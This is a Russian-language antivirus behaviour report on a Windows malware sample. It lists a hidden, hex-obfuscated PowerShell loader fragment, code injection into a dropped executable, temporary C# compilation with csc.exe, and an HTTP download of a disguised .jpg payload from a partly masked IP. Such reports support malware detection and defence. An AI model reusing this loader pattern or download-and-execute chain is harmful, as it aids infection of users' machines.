Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function f61c89a {param($zd5c6)$o249e4='dc46c';$p717b='';for ($i=0; $i -lt $zd5c6.length;$i+=2){$w3f8e1b=[convert]::ToByte($zd5c6.Substring($i,2),16);$p717b+=[char]($w3f8e...
Внедряет код в
следующие пользовательские процессы:
- d69b7d.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\gk6ryyc8.0.cs
- %TEMP%\gk6ryyc8.cmdline
- %TEMP%\gk6ryyc8.out
- %TEMP%\cscf076.tmp
- %TEMP%\resf087.tmp
- %TEMP%\gk6ryyc8.dll
- %APPDATA%\d69b7d.exe
Удаляет следующие файлы
- %TEMP%\resf087.tmp
- %TEMP%\cscf076.tmp
- %TEMP%\gk6ryyc8.cmdline
- %TEMP%\gk6ryyc8.out
- %TEMP%\gk6ryyc8.pdb
- %TEMP%\gk6ryyc8.0.cs
- %TEMP%\gk6ryyc8.dll
Сетевая активность
TCP
Запросы HTTP GET
- http://51.##.128.171/C/_output4159AC0.jpg
Другое
Создает и запускает на исполнение
- '%APPDATA%\d69b7d.exe'
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF087.tmp" "%TEMP%\CSCF076.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gk6ryyc8.cmdline"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gk6ryyc8.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESF087.tmp" "%TEMP%\CSCF076.tmp"
